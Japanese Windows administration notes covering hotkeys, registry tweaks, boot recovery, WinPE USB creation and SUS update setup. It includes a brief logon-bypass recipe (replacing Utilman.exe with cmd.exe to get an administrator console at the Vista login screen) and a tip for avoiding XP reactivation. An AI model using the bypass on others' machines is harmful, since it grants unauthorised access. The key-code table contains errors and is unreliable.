OLE プログラム ID
http://www.microsoft.com/japan/msdn/library/default.asp?url=/japan/msdn/library/ja/vbagr10/html/grmscprogrammaticidentifiers.asp
サーバー側のグラフ作成機能を使用してグラフを動的に生成する方法
http://support.microsoft.com/kb/244049
2007 Office system ドライバ: データ接続コンポーネント
http://www.microsoft.com/downloads/details.aspx?FamilyID=7554f536-8c28-4598-9b72-ef94e038c891&DisplayLang=ja
3D円グラフを使うのはやめよう
http://oku.edu.mie-u.ac.jp/~okumura/blog/node/2266
Windows全般的に使用されるホットキー
タスクの強制終了 CTRL + Alt + DEL
アクティブなタスクの終了 SHIFT + F4
タスクバーの切り替え(右向き) Windowsキー + Tab
タスクバーの切り替え(左向き) Winキー + Shift + Tab
ポップアップウインドを閉じる ESC
タスク(ジョブ)の切り替え Alt + TAB
アクティブ画面の直前のウインドに順次切り替え Alt + ESC
次のコントロールメニューに移動 TAB
前のコントロールメニューに戻る SHIFT + TAB
スタートボタンの表示 CTRL + ESC
ヘルプメニューの表示 F1
ファイルメニューの表示(右クリック and ファイルキー)と等価 SHIFT + F10
ファイルメニューの選択 F10
メニュー項目の選択
カット(切り取り) CTRL + X
コピー(クリップボードに) CTRL + C
ペースト(貼り付け) CTRL + V
アンドゥ(元に戻す) CTRL + Z
デスクトップををクリップボードにコピー PrintScreen(COPY)キー
アクイィブなウィンドをクリップボードにコピー Alt + PrintScreen
SHIFT(orCTRL) + COPY
エクスプローラを起動する Windowsキー + E
全ウインドの最小化 Windwsキー + M
選択位置を行の一番左に寄せる HomeCLR
選択位置を行の一番右に寄せる END(HELP)
ファイルの検索 Windowsキー + F
ファイルや文字の検索 F3
ファイル等の操作に関するホットキー
ファイル全てを選択 CTRL + A
ファイル連続範囲選択 SHFTキー + クリック
ファイル複数選択 CTRL + クリック
行、列一括選択 SHIFT + (PageDoun or PageUP or HomeCLR or END)
削除 DEL
ごみ箱に入れずに直ちに削除 SHIFT + DEL
ファイル名の変更 F2
最新の状態に更新 F5
小窓(フレーム)の切り替え Ctrl + Tab
プロパティを表示 Alt + Enter(Altを押しながらダブルクリック)
一つ上の階層(フォルダ)に戻る BS
エクスプローラで開く SHIFT + Enter(クリック)
『 フォルダを開くたびに新しいウインドを作る』設定の状態で
同じウインドにファイルを開く CTRL + Enter(クリック)
『別のフォルダを開く時に新しいウインドを作らない』設定の状態で
新しいウインドでファイルを開く CTRL + Enter(ダブルクリック)
詳細表示の状態にて一気に列を揃える Ctrl + 『+』
Windowsキーを使用した操作
スタートメニュー WinKEY
タスクバーのアイテム右移動 WinKEY + Tab
タスクバーのアイテム左移動 WinKEY + Shift + Tab
ウインドウズヘルプ WinKEY + F1
システムのプロパティ WinKEY + Pause
エクスプローラ WinKEY + E
スタート釦のファイル名を指定して実行(R) WinKEY + R
デスクトップの表示(Web統合しているIE4以上でのみ有効) WinKEY + D
ファイル検索 WinKEY + F
デスクトップ上の全ウィンドウを最小化 WinKEY + M
上記の操作をしたウィンドを元に戻す WinKEY + SHIFT + M
Windows XP で使用可能なショートカット キー一覧
キーボードショートカットキーの一覧
Windows のキーボード ショートカット
あるサーバだけを [ネットワークコンピュータ] の中に表示させないためには・・・
サーバアナウンスメントをさせない設定が必要。
net config server /hidden:yes
コマンドコンソールから、上記コマンドを入力。
この後,net config コマンドで "隠しサーバー" が "Yes" になっていることを確認してリブートする。
このコマンドにより,以下のレジストリが設定される。
値の名前 HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters
値の型 Hidden(REG_DWORD)
値 1: 隠す 0: 隠さない (デフォルト)
※このコマンド操作を行うと、サーバーサービス のプロパティからの変更処理が効かなくなる
MSKB Article ID Q128167 "Server Service Configuration and Tuning"
が確認されているので、レジストリを直接操作した方が安全。
ある共有ディレクトリだけを [ネットワークコンピュータ] の中に表示されないようにするには・・・
単純に共有名の末尾に "$" を付けることで可能。
この様な "隠し共有" は,サーバ上での net share コマンドで簡単に確認可能
クライアント コンピュータで隠し共有または管理用共有を作成および削除する方法
特殊な共有リソース
タスクマネージャの起動を抑制
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System
値の名前 DisableTaskMgr
値の型 DWORD
値 1 初期値は 0
※設定後にログオンしなおす。
コマンドプロンプトのファイル名の補完機能を利用する
ファイル名補完機能(コマンドプロンプト)
HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor
値の名前 : CompletionChar
値の型 : REG_DWORD
値 : 9
フォルダ名補完
値の名前 : PathCompletionChar
値の型 : REG_DWORD
値 : 9
コマンドプロンプトでファイル名補完。
progra[TAB]とかってすると、program filesと自動的に入力されます。(もちろんprogram filesというフォルダがあった場合のみ)
2000 のデフォルトは 0、XP,2003 は最初から 9
値に対応するキーは以下の通り。
0x01:[Ctrl]+[A]
0x02:[Ctrl]+[B]
0x04:[Ctrl]+[D]
0x05:[Ctrl]+[E]
0x06:[Ctrl]+[F]
0x07:[Ctrl]+[G]
0x08:[Ctrl]+[H]
0x09:[Ctrl]+[I]
0x09:[Tab]
0x0B:[Ctrl]+[K]
0x0C:[Ctrl]+[L]
0x0E:[Ctrl]+[N]
0x0F:[Ctrl]+[Q]
0x10:[Ctrl]+[P]
0x11:[Ctrl]+[Q]
0x12:[Ctrl]+[R]
0x14:[Ctrl]+[T]
0x15:[Ctrl]+[U]
0x16:[Ctrl]+[Y]
0x17:[Ctrl]+[W]
0x18:[Ctrl]+[X]
0x19:[Ctrl]+[Y]
0x1A:[Ctrl]+[Z]
0x1B:[Ctrl]+[[]
0x1C:[Ctrl]+[\]
0x1D:[Ctrl]+[]]
0x1E:[Ctrl]+[A]
0x1F:[Ctrl]+[A]
表示色
値の名前 : DefaultColor
値の型 : REG_DWORD
値 : 0
自動実行コマンド
値の名前 : AutoRun
値の型 : REG_MULTI_SZ
値 : コマンド文字列(デフォルトは値なし)
例)d: & dir & cls & (echo %TIME%) & (echo %DATE%) & (echo %USERNAME%)
複数行は & で繋ぐ。コマンドにオプションが含まれる場合は()で括る。
Windows NT/2000/XP のパフォーマンスを向上させたい場合のチューニング手法
メモリーパラメータの最適化
システムのメモリ管理パラメータをチューニングすることで、メモリを有効利用できる可能性があります。
[スタート]−[ファイル名を指定して実行] から regedit を起動します。
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Memory Management
値の名前 : LargeSystemCache
データ型 : REG_DWORD
値 : 0 Small モデル。アプリケーション起動用に 4MB 確保。稼働中のアプリケーションは遅くなる。(Professional のデフォルト)
1 Large モデル。アプリケーション起動用にメモリーを確保しない。
※アプリケーション起動用メモリの確保。十分なメモリがある場合は、Large モデルに変更する。
値の名前 : DisablePagingExecutive
データ型 : REG_DWORD
値 : 0 カーネルの一部を仮想メモリにスワップアウトする。 (512MB以下
1 カーネルは常にメインメモリに置く (512MB以上
※Windows 2000 があらかじめ確保しているメモリーの予約領域を拡大することで、処理速度の低下を回避
ただし、コンピュータが512MB以上のメモリーを搭載している場合に限る。
512MBよりも少ない場合に設定を変えるとハングアップするなどコンピュータを正常に利用できないこともあるので注意するように。
値の名前 : IoPageLockLimit
値の型 : REG_DWORD
値 : 0(デフォルト)
搭載メモリ量 設定サイズ[10進数]
32MB 4096
64MB 8192
128MB 16384
256MB以上 65536
※ファイルシステム用のキャッシュサイズを最適化。搭載メモリ量に応じてファイルキャッシュを増やすことでパフォーマンスを改善可能。
値の名前 : SecondLevelDataCache
値の型 : REG_DWORD
値 : 0(デフォルトの 0 では 256KB を示す)
※L2 キャッシュサイズを正しく設定。
PentiumII や PentiumIII(Katmai)、Athlon を使っている場合は 10 進数で 512 に変更。P4もかな?
変更する前に CPU-Z 等のツールで確認しましょう。
スプールフォルダの場所を変える
[スタート][設定][プリンタ]→[ファイル][サーバーのプロパティ]→[詳細設定] タブをクリックし、スプールフォルダを変更します。
ページファイルの場所を変える
「マイコンピュータ」を右クリックし、[プロパティ] をクリック
[詳細]→「パフォーマンスオプション」→仮想メモリの「変更」ボタンをクリック
※ページファイルの場所をアクセス競合の少ないと思われるドライブに変更
NTFS ドライブのパフォーマンス向上
ファイルやフォルダの最終アクセス時刻の記録や、8.3 形式の名前生成を停止することで、NTFS ドライブのパフォーマンスを向上させる。
※登録されていない場合は新規で作る必要がある。
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\FileSystem
値の名前 : NtfsDisableLastAccessUpdate
値の型 : REG_DWORD
値 :1(登録しない)
値の名前 : NtfsDisable8dot3NameCreation
値の型 : REG_DWORD
値 : 1(利用しない)
Windows XP, Windows 2003 で MS05-011 適応後にサブフォルダが見えなくなる場合があるようです。
http://support.microsoft.com/kb/896427/ja
64 ビット版の Windows Server 2003 または Windows XP の適切なページング ファイル サイズを決定する方法
http://support.microsoft.com/kb/889654/ja
Cドライブの残りが少なくて印刷出来ないって話を、聞いたので追加
印刷スプーラを別のハード ディスクに移動
コントロール パネル→[プリンタと FAX]
[ファイル]→[サーバーのプロパティ]→[詳細設定]→[スプール フォルダ]
プリンタごとに既定のスプール ディレクトリを移動
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Print\Printers\特定のプリンタ
値の名前 : SpoolDirectory
値の型 : REG_SZ
値 : プリンタのスプール ディレクトリへのフル パス
137503 デフォルトの Windows NT スプール ディレクトリとアクセス権
http://support.microsoft.com/kb/137503/JA/
既定の Windows ページング ファイルと印刷スプーラを別のハード ディスクに移動する方法
http://support.microsoft.com/kb/314105/ja
Documents and SettingsをDドライブに移動する
http://www.center-left.com/backup/move_data_folder.html
ちなみに、Windows Server 2003 までは Windows の仕様制限で 印刷の管理 で管理出来るプリンターの最大接続数は 10 までとなっています。
10台以上ある場合は、 Windows Server 2008 が必要。
Windows 2000の機能を利用し、パスワードを自動生成する
「net user」コマンドの隠しオプションに「/random」があるので
これを使用し、パスワードの変更とパスワードの自動生成を同時に行う。
構文
ローカルユーザ
net user ユーザー名 /random
ドメインユーザーの場合
net user ユーザー名 /domain /random
変更はAdministratorでログインしておく必要が有る。
変更例
ローカルユーザー「gestuser」のパスワードの生成と設定を行う。
net user gestuser /random
実行結果は
gestuserのパスワード: Q4qXdWr_
次回のログインからこのパスワードが有効になるので、パスワードのメモを取っておく。
※パスワードの管理は厳重に!
記事がありました。
Administratorのパスワードを簡単に設定する
http://arena.nikkeibp.co.jp/tec/winxp/20040913/109432/
ついでに
認術大会
http://www.securityfriday.com/jp/contents/ninjutsutaikai.htm
新連載:ツールを使ってネットワーク管理(5)
俺の「パスワード:*****」って何でしたっけ? 〜アプリケーションのパスワード調査編〜
http://www.atmarkit.co.jp/fnetwork/rensai/netool05/asterisklogger01.html
パスワードの重要性を再認識せよ〜“破り方”を知り,対策に役立てる〜
http://itpro.nikkeibp.co.jp/article/COLUMN/20060513/237782/
パスワードの運用(利用者編)
http://itpro.nikkeibp.co.jp/article/COLUMN/20060330/233897/
パスワードの運用(管理者編)
http://itpro.nikkeibp.co.jp/article/COLUMN/20060406/234748/
正しいパスワード ポリシーを選択する
http://www.microsoft.com/japan/technet/community/columns/5min/5min-302.mspx
強力なパスワード : その作り方と使い方
http://www.microsoft.com/japan/athome/security/privacy/password.mspx
システムが何らかの原因によって破損し、デスクトップが表示されない時のWindowsの復活方法
・DOS等で起動する
・c:\windows\systemのsystem.iniを開き
[boot] セクションの shell=Explorer.exe と書かれた行を、
shell=Progman.exe に書き換える。
※バックアップはきちんと取りましょう。
デスクトップでマウスの右クリックから「最新の情報に更新」や「セーフモードによる起動」も試してみましょう。。。
ログオン以降で問題が発生している場合
問題が発生していない別のアカウントでログオン出来る場合は、障害が発生したユーザのプロファイルが原因の可能性が高い。
この場合は、Administrator(管理者権限)でログインして、システムのプロパティの詳細設定から問題が発生したユーザの
プロファイルを削除。(プロファイルが再構成されログオンできる可能性がある)
関連
ファイルが失われているか壊れていてWindows XPを起動できない場合の回復コンソールでの修復方法
Windows XP のログオン画面が表示されず、コンピュータが再起動し続ける
ハード ディスクを NTFS ファイル システムに変換後 Windows XP を再起動したときのエラー メッセージ "次のファイルが存在しないかまたは壊れているため、Windows を起動できませんでした: System32\Drivers\Ntfs.sys"
Windows Millennium Edition でクリーン ブートを実行する方法
Windows 98 でクリーン ブート トラブルシューティングを実行する方法
[HOWTO] Windows XP で高度なクリーン ブート トラブルシューティングを実行する
Windows 2000 でクリーンブート トラブルシューティングを実行する方法
レジストリの破損により Windows XP を起動できなくなった場合の回復方法
特定の STOP メッセージのトラブルシューティング
Windows 2000/XP/2003 のシステム・ファイルを誤って削除してしまった場合は
sfc.exe(システム・ファイル・チェッカー)を利用すると簡単に修復できます。
サポートツールの中にある、Depends.exe(Dependency Walker)を使うと起動に失敗するサービスやドライバで
不足しているコンポーネントや、古いコンポーネント、破損しているコンポーネントを調査できます。
なんらかの原因で、HDD からブート出来なくなった場合に FD からのブートさせる方法
※ Ntldr がなんらかの原因で破損し、読み取れない場合 ( NTLDR is missing と表示される時 )
ブートディスクの作成方法
1.フロッピーディスクを FAT でフォーマット
※ Win98/Me ではダメです。
2.その PC のシステムドライブから 下記ファイルをコピー
・Ntldr
・boot.ini
・Ntdetect.com
※コンピュータが既に起動出来ない場合は、別マシンからコピーでも OK
また、インストール用 CD の i386 フォルダにある
・Ntldr
・Ntdetect.com
でもコピー可能です。
3.コピーした Boot.ini をメモ帳で開く。
記述されているシステムフォルダのパスが、「multi(x)」から始まる場合
(IDE の場合)は、これで起動用フロッピーの完成です。
「scsi(x)」から始まる場合は、SCSI コントローラのドライバーが必要に
なります。この場合は、デバイスマネージャから、ドライバーを特定して
FD にコピーして下さい。
※コピーしたら、ファイル名を「Ntbootdd.sys」に変更する事。
※ Windows 2000/2003 以外での確認はしていません。
コンピュータの起動時にエラー メッセージ "次のファイルが存在しないかまたは壊れているため、Windows を起動できませんでした" が表示される
フロッピー・ディスクからWindows OSを起動する
とりあえず、インストールCD から 修復セットアップで
C:\>chkdsk /r
してみると、直るかも。
boot.ini
NTDETECT.COM
ntldr
bootfont.bin
をコピーする場合は、OS の CD から 回復コンソールを起動し
C:\>copy D:\i386\ntldr
ATTRIB -C C:\NTLDR
exit
で CD からコピーして圧縮属性を外して再起動。
・NTDR is missing
・Missing Operating System
・Operating System Not Found
・Invalid system disk
が表示されている場合は、回復コンソールからブートセレクタとMBR を修復してみる。
ブートセレクタの修復コマンドは、「fixboot」
MBR の修復コマンドは、「fixmbr」Windows Vistaの場合は bootrec /FixMbr, Windows 98/Me は fdisk /mbr
●セーフモードで起動出来た場合
「システム構成ユーティリティ(Msconfig.exe)」を使用し
スタートアップオプションで起動するサービスやスタートアップ項目を選択、通常起動を試す。
※セーフモードで実行中のサービスを無効にしないように
●セーフモードで起動出来ない場合
「ブートログ作成を有効にする」を利用してログを確認
「%Systemroot%\Ntbtlog.txt」に書き込まれるログを回復コンソールや WindowsPE2.0 環境から
確認して、どこで起動がストップしているかを判断
●起動が失敗しているサービスやドライバ、プログラムが判明したら
サポートツールの「Dependency Walker(Depends.exe)」で検査
Dependency Walker は、ファイルが見付からない、破損している、古くなっている等の理由で
アプリケーションやサービス、コンポーネントが起動しない状況を検査できるツール
●まったく起動できないシステムの場合
回復コンソール を利用し「LISTSVC」コマンドを実行
このコマンドは、回復コンソールでログオンした Windows に登録されている
サービスやシステムのスタートアップ一覧が確認出来る。
問題となっているサービスやドライバ名を確認したら「DISABLE」コマンドを利用
DISABLE コマンドは、そのサービスやドライバを無効に設定する。
逆に有効にするには、「ENABLE」コマンドを使う。
●破損したファイルを CD(圧縮ファイル)を使って上書き
例)オリジナルの圧縮ファイル「D:\I386\WIN32K.SY_」
EXPAND D:\I386\WIN32K.SY_ C:\WINDOWS\SYSTEM32
●更新プログラムが原因の場合の回復コンソールを使ったアンインストール
更新プログラムの KB 番号を調べる
回復コンソールにログインして「BATCH」コマンドを利用してアンインストール
例)「KB926247(MS06-074)」の場合
「$NtUninstallKB926247$」この下に「SPUNINST」フォルダがあり
SPUNINST.TXT と言うファイルがある。
このファイルには、回復コンソール内で更新プログラムをアンインストール
する為のコマンドラインが記述されている。
CD $NtUninstallKB926247$\SPUNINST
BATCH SPUNINST.TXT
●レジストリが原因の場合
レジストリの破損により Windows XP を起動できなくなった場合の回復方法
http://support.microsoft.com/kb/307545/ja
ついでにメモリもチェック
Windows メモリ診断
http://oca.microsoft.com/ja/windiag.asp
ログオフに長い時間がかかったり、プロファイルの整合性が取られないなどの問題を解決するツール
User Profile Hive Cleanup Service
http://www.microsoft.com/downloads/details.aspx?FamilyID=1b286e6d-8912-4e18-b570-42470e2f3582&DisplayLang=ja
VISTA でログオンパスワードを忘れた場合
Vistaは誰でも管理者権限で操作可能、新たなセキュリティーホールが見つかる
http://www.technobahn.com/news/2008/200805261637.html
CDブートして、Utilman.exeをcmd.exeに置き換えてリブート
ログイン画面で「U」を押して「Utilman.exe」のコンソール画面を起動
コンソール画面から「explorer」を起動で管理者権限で全て操作可能と。
2008 Server もいけるかもしれませんね。
ファイルを1つコピーするだけでWindowsXPの再アクティベートを回避する術
http://www.lifehacker.jp/2008/09/1windowsxp.html
Windows XPのアクティベーション情報をバックアップする
http://www.atmarkit.co.jp/fwin2k/win2ktips/1148backupwpa/backupwpa.html
System32 の WPA.DBL をバックアップしておいてから、再セットアップ後の上書きで OK のようです。
ログイン出来ている間に用意しておきましょう。
Microsoft Windows Vista でのディスクのリセット、パスワードを作成します。
http://support.microsoft.com/kb/959061
Windows Vista でパスワード リセット ディスクを作成して使用する方法
http://support.microsoft.com/kb/930381
起動しなくなったシステムからデータをサルベージするには?
http://www.computerworld.jp/topics/mws/165609-1.html
オフラインの状態でレジストリを編集するには?
http://www.computerworld.jp/topics/mws/165609-3.html
ブートディスクの作成
このWindows 2000用起動ディスクの用途としては、MBR(Mustor Boot Record)が壊れてしまった場合などの緊急用として
必要ファイル
boot.ini
bootfont.bin
ntdetect.com
ntldr
bootsect.dos このファイルはデュアルブートしている環境時に必要
Windows2000がインストールされている事が前提となる。
※ MBR の修復は、回復コンソールから 「FIXMBR」を実行することで修復出来ます。
[HOWTO] Windows Server 2003 ファミリで NTFS または FAT パーティション用のブート ディスクを作成する方法
http://support.microsoft.com/default.aspx?scid=kb;ja;325879
Windows PE を用意しておくと楽かも。
作成手順
1.BDD2007 をインストール
Microsoft Solution Accelerator for Business Desktop Deployment 2007
http://www.microsoft.com/japan/technet/desktopdeployment/bdd/2007/default.mspx
2.スタート>プログラム>BDD 2007>Deployment Workbench を起動
3.Deployment Workbench>Information Center>Components へアクセスして必要なコンポーネントをダウンロード、インストール
(Windows Automated Installation Kit を選択してインストールすること)
4.Deployment Workbench>Deploy>Deployment Points>New を選択
5.中央に出てくる「LAB」を選択し、Update をクリック(Windows PE の ISO イメージが LiteTouchPE_x86.iso という名で作成される)
Windows PE 2.0 による USB メモリからの Bootは
Windows 自動インストール キット (AIK)
http://www.microsoft.com/downloads/details.aspx?familyid=C7D4BC6D-15F3-4284-9123-679830D629F2&displaylang=ja
1.管理者として Windwos PE Tools コマンド プロンプトを起動し、作業用フォルダを作成
C:\Program Files\Windows AIK\Tools\PETools>CopyPE x86 c:\WinPE (32ビット版)
C:\Program Files\Windows AIK\Tools\PETools>CopyPE amd64 c:\WinPE (64ビット版)
2.コピーされた WindowsPE2.0 を MOUNT フォルダに展開
C:\WinPE>imagex /apply winpe.wim 1 mount
C:\WinPE>peimg /list mount 展開されたコンポーネントの確認
3.WHS と WMI を追加
C:\WinPE>peimg /install=winpe-scripting-package mount\windows
C:\WinPE>peimg /install=winpe-wmi-package mount\windows
4.不要なパッケージ削除し、最適化
C:\WinPE>peimg /prep mount/windows
5.デバイスドライバの追加
C:\WinPE>peimg /inf=ドライバのファイルパス mount\windows
よく使うツール等も、mount\windows に入れておく。(RAMDISK に置かなくて良ければ ISO フォルダへ)
6.ISO イメージの作成
C:\WinPE>imagex /capture mount iso\sources\boot.wim "Custom WinPE" /boot /compress max
7.起動可能な ISO イメージに作り変える
C:\WinPE>oscdimg -n -betfsboot.com iso CustomWinPE.iso
8.USB メモリに入れる
USB メモリを FAT32 でフォーマット
C:\WinPE>diskpart
diskpart>select disk
list disk
select disk 1
clean
create partition primary size=サイズを設定
select partition 1
active
format fs=fat32
assign
exit
ISO フォルダの内容をコピーする。
※PE から起動して、シャットダウンする場合は、wpeutil コマンドを使う。
Windows Server 2003 でのWindows 展開 サービス(WDS)ログインを有効にする方法
http://support.microsoft.com/kb/936625
管理者必携! 最強のデータ・サルベージ・ツールを自作する
http://www.atmarkit.co.jp/fwin2k/operation/winpe2/winpe2_01.html
Windows Vista 用の更新プログラム (KB942813)
http://www.microsoft.com/downloads/details.aspx?FamilyID=40f4edfd-566c-420d-b9c7-c41e5afcdba0&DisplayLang=ja
Windows Vista for x64-based Systems 用の更新プログラム (KB942813)
http://www.microsoft.com/downloads/details.aspx?FamilyID=583fd9f0-fad1-41d9-84d6-a373dbd638a3&DisplayLang=ja
WinPE 2.0 に非標準の大容量記憶装置用ドライバを追加する方法
http://support.microsoft.com/kb/944348
946084 の修正プログラムがコンピュータにインストールされていても、Windows Vista ベース コンピュータを起動すると、STOP エラー:"0x0000C1F5"
http://support.microsoft.com/kb/958069
最終手段?
使用不能になったハードディスクを復活させる「HDD Regenerator」
http://gigazine.net/index.php?/news/comments/20060811_hdd_regenerator/
データ復旧「データサルベージコーポレーション」による復旧事例の数々をムービーでチェック、ハードディスクが壊れてもあきらめてはいけない
http://gigazine.net/index.php?/news/comments/20080916_data_salvage_hdd_repair_coop/
ハードディスク劣化の原因と対策
http://hddbancho.co.jp/deteriorationandmeasuresof_hdd.html
Windowsはどうやって起動しているのか?
http://itpro.nikkeibp.co.jp/article/COLUMN/20080929/315572/
オフラインの状態でレジストリを編集するには?
http://www.computerworld.jp/topics/mws/165609-3.html
レジストリの破損により Windows XP を起動できなくなった場合の回復方法
http://support.microsoft.com/kb/307545
Software Update Servicesをセットアップ
SUSのサーバへのインストール
1. IIS 5.0をインストール
2. IE 6.0をインストール
3. SP3の適用 4. SP3にセキュリティ修正モジュールを適用
5. SUSサーバモジュールをインストール ⇒ http://www.microsoft.com/japan/windows2000/windowsupdate/sus/default.asp
「SUSSetup.msi」を右クリックして「インストール」を選択
セットアップの構成は「標準」でOK
この場合、最も容量の多いNTFSフォーマットされたドライブがコンテンツの保存先用ドライブとして選択される。
5.1. ダウンロードURLを控えておく。 「インストールの準備完了」画面の「ダウンロードURLの指定」に表示されるURL
(http://<SUSサーバー名>/)はSUSクライアントでSUSサーバの指定をする時に必要になるので、URLをメモしておく。
5.2. IIS Lockdown Wizardの自動実行
IIS5.0のセキュリティを高める為に自動実行される。
SUSをアンインストールしても、この設定は保存される。
IIS Lockdown Wizardで変更される設定
スプリクトの実行:許可
ASPの有効化
スプリクトマッピングの削除
IDQ,SHTML,STM,IDC,printer,HTRのマッピング無効化
「既定のWebサイト」のファイル削除
/Scripts, /MSDAC仮想ディレクトリの削除
WebDAVの無効化
WebDAVの無効化
IISの匿名ユーザの制限
システムユーティリティの実行:禁止
コンテンツの書き込み:禁止
5.3. 管理用WebサイトのURLを記録しておく。
SUSセットアップウイザードの完了時に表示されるURL(http://<SUSサーバ名>/SUSAdmin/)は
SUSサーバ以外のコンピュータからSUSサーバの設定を行う際に必要になるのでURLをメモしておく。
SUSサーバのオプションを設定
SUSサーバのモジュールのインストールが完了したら、管理ツールから「Software Update Services」を起動
●プロクシサーバの設定
SUSサーバがWindows Updateサイトとhttpで通信出来るようにします。
直接通信可能であれば、「インターネットへのアクセスにプロクシサーバを使用しない」を選択する。
●この更新サーバを見つけるためにクライアントが使用する名前を指定してください
SUSクライアントがSUSサーバに接続する際に使用する名前を、NetBIOS名、<サーバ名>.<インターネットドメイン名>
(Fully Qualified Domain Name:FQDN)で指定する。また、IPアドレスを指定する事も可能
●コンテンツを同期するサーバを選択します
管理対象のSUSサーバがスタンドアロンや親SUSサーバの場合は、「Windows Updateサーバから直接同期する」を選択
●以前に許可された更新の新しいバージョンを処理する方法を選択してください
既に許可済みの修正モジュールの更新版をWindows Updateサイトから取得した場合に
その修正モジュールを自動的に許可済みにするか、管理者が改めて許可し直すかを設定
●更新を保管する場所を選択します 適用可能な修正モジュールの制限のみを目的とする場合や、SUSサーバの空き容量が少ない場合は
「Windows Updateサーバで更新を維持する」に選択 SUSサーバにカタログファイルと、パッケージの両方を保存する場合は
「更新をローカルフォルダに保存する」を選択
⇒デフォルトでは全ての言語が選択されているので必要なもののみに変更しておく
Updateサイトから、Windows2000、XPの全ての言語パッケージをダウンロードすると
膨大なネットワーク帯域とディスク容量が必要となるので注意する事
●コンテンツの同期を実行する
SUSサーバのオプションを設定して実行の準備が整ったら、「サーバの同期」をクリックして
Windows Updateサイトからコンテンツをダウンロードする。
●モジュールごとに更新を許可する
同期処理でダウンロードした更新モジュールは、システム管理者が許可するまでSUSクライアントにインストール出来ません。
設定するには、「更新の許可」をクリックしてモジュール名の右に「許可されていません」と表示された更新モジュール
を個別に許可する必要があります。これによって、システム管理者がシステム環境に適合するSPやSRP、修正モジュールを
任意に選択してSUSクライアントに提供出来るようになる。
SUSのクライアントへのインストール
・Windows 2000 Service Pack 3(単体ではなくSP3に組み込み済み)
・Windows xp Service Pack 1
・Webからのダウンロード(Windows 2000/xp)
⇒ http://www.microsoft.com/japan/windows2000/windowsupdate/sus/default.asp
クライアントをSUSに同期させる
●ポリシーの設定
1. 名前を指定して実行で、「gpedit.msc」を起動
2. 「コンピュータの構成」→「管理用テンプレート」を右クリックして「テンプレートの追加と削除」を選択
3. ダイアログの「追加」ボタンを押して、「wuau.adm」を選択する
●自動更新を構成する
設定値 2-ダウンロードの前、及びインストールの前に通知し、コンピュータにインストールする前に再度通知する
3-更新を自動的にダウンロードして、インストールの準備が出来たら通知する
4-更新を自動的にダウンロードして、指定したスケジュールでインストールする
●サーバを指定する
「イントラネットのMicrosoft 更新サービスの場所を指定する」を選択
更新を検出するためのイントラネットの更新サービスを指定する、イントラネット統計サーバーの設定に
SUSサーバのアドレスを入力する。※設定をすると、コントロールパネルの「自動更新」は利用できなくなります。
●強制的にポリシーを適用
Windows2000 secedit /refreshpolicy machine_policy
Windows2000 secedit /refreshpolicy user_policy
WindowsXP gpupdate /force
●Windows Updateを無効にする
1. 名前を指定して実行で、「gpedit.msc」を起動
2. 「ユーザの構成」→「管理用テンプレート」→「Windowsコンポーネント」→「Windows Update」から
「Windows Update のすべての機能へのアクセスを削除する」を有効にする
設定すると、以下のレジストリが追加されます。
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate
WUServer : http://SUSServer
SUSサーバのURLを指定します。
WUStatusServer : http://SUSServer
ステータスサーバのURLを指定します。
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU
値の名前 : NoAutoUpdate
データ型 : REG_DWORD
値 : 0(自動更新を行ないます)
1(自動更新を行ないません)
値の名前 : UseWUServer
データ型 : REG_DWORD
値 : 0 = WUServerで指定されたSUSサーバを使いません
1 = WUServerで指定されたSUSサーバを使います
値の名前 : AUOption
データ型 : REG_DWORD
値 : 2 = 更新をダウンロードする前、およびインストールする前に通知する
3 = 更新を自動的にダウンロードし、インストールの準備ができたら通知します
4 = 更新を自動的にダウンロードし、ScheduledInstallDayとScheduledInstallTime
で指定されたスケジュールでインストールします
値の名前 : ScheduledInstallDay
データ型 : REG_DWORD
値 : 0(毎日) 1〜7 = 日曜日(1) から土曜日 (7) の曜日
AUOption = 4の時に、自動インストールが行なわれる曜日を指定します。
値の名前 : ScheduledInstallTime
データ型 : REG_DWORD
値 : 0〜23 = 24時間形式の時刻。
AUOption = 4 の時に、自動インストールが行なわれる 時刻を指定します。
※以下、Windows2000 SP4インストール時に追加されます。
Software Update Services 1.0 ADM File for Service Pack 1 日本語版
このポリシーを追加する事でも設定可能になります。
値の名前 : RescheduleWaitTime
データ型 : REG_DWORD
値 : 1 〜 = 自動更新の再スケジュール時間。分単位。
値の名前 : NoAutoRebootWithLoggedOnUsers
データ型 : REG_DWORD
値 : 0 = 無効。自動更新が終了し5分以内に再起動することを通知。時間経過後再起動をを実施。
1 = 有効。自動更新がコンピュータを自動的に再起動せずユーザーに再起動が必要であることを通知。
●SUSクライアントのログの意味
/wutrack.bin? U=ping_ID C=client A=activity I=item D=device P=platform L=language S=status E=error M=message X=proxy
ping_ID 各クライアントマシンに一意に割り当てられる固有の識別子を示す。
client 値
AU: ダウンロードやインストール
IU: 初期化
IU_[サイト名]: ユーザがWindows Update サイトに接続する場合
activity 動作に関する情報を示す。
n: 初期化
s: セルフアップデート
d: 検出
w: ダウンロード。成功および失敗、また該当する場合は取り消しと拒否が記録される。
i: インストール。再起動のない失敗と成功、および再起動を伴う成功、および該当する場合は拒否が記録される。
item activity で指定された処理が行なわれるコンポーネント(あれば)を示す。
device 処理対象のデバイス ID(あれば)を示す。
platform クライアントマシンのシステムに関する情報を示す。
このフィールドには、「.」区切りで OS 関連の情報が記録される。
[maj_os_ver].[min_os_ver].[build_num].[plat_id].[suite_mask].[prod_type].[processor_arch]
plat_id システムの系列を示す。
1: Windows 9x系OS(Windows 95/98/Me)
2: Windows NT系OS(Windows NT/2000/XP)
suite_mask インストールされている製品に関する情報を示す。
このフィールドはビットマスクになっている。
よく使われるであろうビット
2: Windows 2000 Advanced Server か Windows .NET Enterprise Server がインストールされている
4: Microsoft BackOffice コンポーネントがインストールされている
10: Terminal Services がインストールされている
100: Terminal Services の単一ユーザバージョンがインストールされている
200: Windows XP Home Edition がインストールされている
prod_type システムに関する情報を示す。
1: ワークステーション (Windows NT 4.0 Workstation/Windows 2000 Professional/Windows XP Home Edition/Windows XP Professional)
2: ドメイン コントローラ
